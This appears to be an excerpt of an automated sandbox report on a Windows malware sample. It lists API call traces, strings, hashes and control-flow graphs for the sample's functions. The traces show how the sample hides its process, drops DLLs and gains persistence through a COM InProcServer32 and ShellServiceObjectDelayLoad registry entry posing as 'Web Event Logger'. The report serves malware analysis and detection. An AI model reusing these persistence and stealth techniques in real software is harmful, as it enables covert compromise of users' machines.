                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE
                            Function 00403619 Relevance: 7.6, APIs: 5, Instructions: 58filememoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 60 403619-40364c CreateFileA 61 403664-403682 GetFileSize LocalAlloc 60->61 62 40364e-403652 60->62 63 403684-40368a 61->63 64 40368c-40368f 61->64 65 403654-403657 62->65 66 40365a-40365c 62->66 67 403692-4036ab ReadFile CloseHandle 63->67 64->67 65->66 66->61 68 4036ae-4036b2 66->68 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D
                            Function 00403F68 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 135fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Nejhbi32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Nejhbi32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Nejhbi32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Nejhbi32,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Nejhbi32$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-480674795
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69
                            Function 00403CE9 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 197COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD
                            Function 00404148 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754
                            Function 0040365E Relevance: 6.0, APIs: 4, Instructions: 30memoryfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E
                            Function 00407980 Relevance: 4.5, APIs: 3, Instructions: 47stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 81 4079a6-4079a9 79->81 82 4079cf-4079dc GetModuleHandleA call 406c29 79->82 83 4079c0 80->83 84 4079bb-4079be 80->84 85 4079ac-4079af 81->85 89 4079e1-4079e3 82->89 87 4079c3-4079c8 83->87 84->83 86 4079b3 84->86 90 4079b1 85->90 91 4079ab 85->91 86->80 87->82 92 4079ca-4079cd 87->92 90->82 91->85 92->82 93 4079c2 92->93 93->87
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B
                            Function 00401219 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F
                            Function 0040121F Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Non-executed Functions

                            Function 00405133 Relevance: 65.0, APIs: 28, Strings: 9, Instructions: 238stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            Function 00405C09 Relevance: 59.7, APIs: 25, Strings: 9, Instructions: 230stringfilesleepCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
